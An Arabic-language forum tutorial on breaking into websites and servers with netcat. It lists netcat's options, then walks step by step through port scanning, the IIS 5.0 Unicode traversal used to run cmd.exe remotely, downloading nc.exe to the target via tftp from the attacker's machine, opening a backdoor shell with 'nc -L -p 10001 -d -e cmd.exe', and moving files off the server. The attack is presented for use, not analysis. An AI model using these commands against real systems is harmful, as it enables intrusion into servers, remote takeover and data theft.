بسم الله والصلاة على نبينا محمد
((اللهم لاعلم لنا الاما علمتنا))
--------------------------------------
موضوعنا اليوم الاختراق بواسطه اداة النت كات net cat لاختراق المواقع والسيرفرات.
تعريفnet cat
هي اداه من ادوات الدوس , موجوده في اليون** , لكن يمكن انزلها للويندوز.
وهي قابلة للكتابه والقراءه عبر اتصالات الشبكات TCP و UDP .
ولها استخدامات عده , مثلا عمل باك دور .التنصت على البورتات...الخ
لتحميل النت كات((مرفق))
اهم اوامر النت كات :
-e specifies a program to exec after
making/receiving a connection
-g gateway source-routing hop point[s], up to 8
-G num source-routing oiter: 4, 8, 12
-i secs delay interval for lines sent, ports scanned
-l listen mode for inbound connections
-n only accept numeric IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize
-s addr local source address
-t netcat will respond to telnet option negotiation
"this allows it to connect to a telnetd and
get past initial negotiation far enough to get
a login prompt from the server"
-u UDP connection mode
-v verbose mode
-w secs wait - timeout for connects
-z zero I/O mode [used for scanning]
For NT netcat, all of the above options exist, plus a few others.
-d detach - don't open a new DOS ******
-L keep listening after the current session terminates
===================================
الخطوات
1-نعمل اسكان على البورتات باالامر : nc –v –z 192.168.1.90 1-200
[Le lien de cette image n'est plus valide]
طبعا نطلع الاي بي اللي نبغى نسوي عليه اسكان بـping مثلا..
ping
www.?????.com ((طبعا افتراضي))
والاي بي ظهر عندنا 192.168.1.90 ونسوي عليه اسكان
النتيجه..بورت المتصفح والتلنت والاف تي بي ويظهر انها مفتوحه((open))
-----------------------------------
2- الاتصال بالبورت
عن طريق الامر : nc –v –n 192.168.1.90 80
[Le lien de cette image n'est plus valide]
[Le lien de cette image n'est plus valide]
وطلع لنا ان الموقع((الافتراضي)) شغال على ويندوز 2000 وعلى سيرفر IIS5.0.و فيه ميكورسوفت FTP
الان بتخترق الموقع...بنفتح باك دور بالموقع عن طريق النت كات
طبعا لازم نرفع النت كات للموقع
راح نستخدم سكربتات اليونيكود الرهييييييييبه لان الموقع على سيرفر IIS5.0
[Le lien de cette image n'est plus valide]
استخدمنا السكربت
http://192.168.1.90/******s/..%255c...md.exe?/c+dir+cلاستعراض محتويات الدرايف C .. للمجلد ******s
والنتيجه:_ : ********s and Settings , Inetpub , Program Files , WINNT
الان بنرفع النت كات على سيرفر IIS بنستخدم ال tftp
[Le lien de cette image n'est plus valide]
حطينا هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir حطينا امر tftp
بهذه الطريقه طريقه
http:///c+TFTP+-i+192.168.1.9+GET+nc.exe----------------------------------------------------------------------
الان راح نستخدم برنامج TFTPD32(((مرفق)))
يبين اذا النت كات انرفع للسيرفر بنجاح.؟؟!!
[Le lien de cette image n'est plus valide]
[Le lien de cette image n'est plus valide]
اممممممممم الحمدلله كل شي تمام
الان نبغى النت كات يفتح لنا باك دور (Back Door)
لكن قبل لازم نخليه يتنصت على بورت السيرفر مثلا البورت 10001 وبعدين راح
نتصل بالبورت عن طريق النت كات
نستخدم هذا الامر للنتصت : nc -L -p 10001 -d -e cmd.exe
بنكتب الامر في سكربت اليونيكود
هكذا
http:///c+nc+-L+-p+10001+-d+-e+cmd.exe[Le lien de cette image n'est plus valide]
تنصتنا على البورت 10001 , وفتحنا باك دور على الدوس cmd.exe
الان بتنصل على النت كات اللي بالسيرفر
[Le lien de cette image n'est plus valide]
اتصلنا بالبورت المتنصتين عليه 10001بالامر nc –v –n 192.168.1.90 10001
لاحظ.......
دخلنا على ملف ******s الي فالسيرفر , وطبقنا الامر ipconfig والنتيجه انه طلع لنا ايبي السيرفر
تمام التمام الان..نتحكم الان بالسيرفر من بعيد
نبغي ننقل الملفات بواسطة النت كات ..؟؟؟؟؟؟؟؟
مثلا نبغى ملف اسمه hack.txt بالسيرفر عن طريق
هذا الامر : nc –l –p 1234 >hack.txt
عن طريق بورت 1234 لسحب الملف
[Le lien de cette image n'est plus valide]
وللرفع للسيرفر عن طريق هذا الامر :
nc 192.168.1.90 1234